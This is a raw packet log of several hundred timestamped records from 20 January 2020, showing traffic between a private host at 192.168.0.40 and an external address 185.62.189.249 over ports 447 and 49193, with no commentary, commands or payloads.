Jan 20, 2020 14:20:30.271806002 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.271939993 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.271979094 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.272072077 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.272178888 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.272248983 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.272278070 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.272388935 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.272449017 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.272501945 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.272625923 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.272675037 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.272730112 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.272857904 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.272906065 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.272960901 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.273113012 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.273138046 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.273228884 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.273334980 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.273396969 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.273448944 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.273560047 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.273622990 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.273660898 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.273773909 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.273839951 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.273900032 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.273999929 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.274074078 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.274127960 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.274307966 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.274411917 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.289994001 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.290055990 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.290083885 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.290205002 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.290750027 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.290770054 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.290826082 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.290906906 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.290977955 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.291081905 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.291138887 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.291181087 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.291295052 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.291361094 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.291362047 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.291529894 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.291532040 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.291606903 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.291776896 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.294572115 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.294651985 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.294677973 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.294814110 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.295224905 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.295416117 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.295437098 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.295540094 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.295634985 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.295651913 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.295818090 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.295821905 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.295861959 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.295998096 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.296075106 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.296165943 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.296197891 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.296278954 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.296336889 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.296442032 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.296550989 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.296658039 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.296768904 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.296880007 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.296993971 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.297117949 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.297204971 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.297225952 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.297338009 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.297425032 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.297451973 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.297569036 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.297616959 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.297678947 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.297794104 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.297847033 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.297930002 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.298093081 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.298100948 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.298204899 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.298312902 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.298365116 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.298414946 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.298518896 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.298577070 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.298650980 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.298774004 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.298816919 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.298896074 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.298999071 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.299066067 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.299091101 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.299215078 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.299285889 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.299331903 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.299442053 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.299519062 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.299555063 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.299664974 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.299724102 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.299793005 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.299906015 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.299973011 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.300007105 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.300111055 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.300219059 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.300231934 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.300331116 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.300404072 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.300436974 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.300548077 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.300609112 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.300666094 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.300776958 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.300853968 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.300903082 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.301001072 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.301548004 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.309694052 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.314393044 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.314510107 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.314614058 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.314620018 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.314796925 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.314831972 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.314924002 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.314959049 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.315110922 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.315169096 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.315242052 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.315340996 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.315462112 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.315491915 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.315520048 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.315630913 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.315689087 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.315752983 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.315948009 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.320549965 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.320724964 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.320967913 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.321132898 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.321254969 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.321374893 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.321450949 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.321513891 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.321623087 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.321696997 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.321728945 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.321854115 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.321927071 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.321994066 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.322097063 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.322175980 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.322218895 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.322334051 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.322408915 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.322444916 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.322556019 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.322633982 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.322674990 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.322808981 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.322832108 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.322848082 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.322972059 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.323005915 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.323098898 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.323194027 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.323266983 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.323303938 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.323416948 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.323462963 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.323558092 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.323683023 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.323724985 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.323784113 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.323915958 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.323940992 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.324022055 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.324120045 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.324222088 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.324223042 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.324337006 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.324392080 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.324451923 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.324553967 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.324637890 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.324677944 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.324776888 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.324840069 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.324902058 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.325012922 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.325068951 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.325193882 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.325310946 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.325361013 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.325416088 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.325542927 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.325583935 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.325624943 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.325747967 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.325799942 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.325855970 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.325973034 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.326018095 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.326075077 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.326220036 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.326236963 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.326343060 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.326446056 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.326499939 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.326541901 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.326659918 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.326703072 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.326760054 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.326894045 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.326941013 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.326997042 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.327104092 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.327163935 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.334266901 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.334575891 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.339744091 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340013027 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340034008 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340135098 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340245962 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340255022 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.340276957 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340410948 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340423107 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.340617895 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340639114 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.340667963 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340795994 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340864897 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.340959072 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.340981960 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.341110945 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.341222048 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.347517967 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.347539902 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.347759962 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.347791910 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.347876072 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.347989082 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.348033905 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.348059893 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.348100901 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.348211050 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.348320961 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.348340988 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.348443985 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.348521948 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.348557949 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.348681927 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.348820925 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.348843098 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.348872900 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.348999023 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.349090099 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.349220991 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.349298954 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.349349022 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.349410057 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.349544048 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.349570990 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.349572897 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.349678993 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.349744081 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.349807024 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.349915981 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.349976063 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.350035906 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.350141048 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.350192070 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.350284100 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.350379944 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.350450993 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.350492954 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.350598097 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.350670099 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.350723028 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.350832939 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.350914001 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.350955963 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.351119041 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.351138115 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.351243973 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.351352930 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.351404905 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.351463079 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.351584911 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.351630926 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.351689100 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.351795912 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.351855993 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.351897001 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.352011919 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.352065086 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.352109909 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.352220058 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.352287054 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.352334023 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.352447987 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.352494001 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.352555037 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.352675915 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.352718115 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.352777958 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.352891922 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.352946043 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.353005886 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.353135109 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.353169918 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.353230953 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.353347063 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.353404999 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.353465080 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.353578091 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.353632927 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.353660107 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.353820086 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.365920067 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.365997076 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.366130114 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.366203070 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.366300106 CET	447	49193	185.62.189.249	192.168.0.40
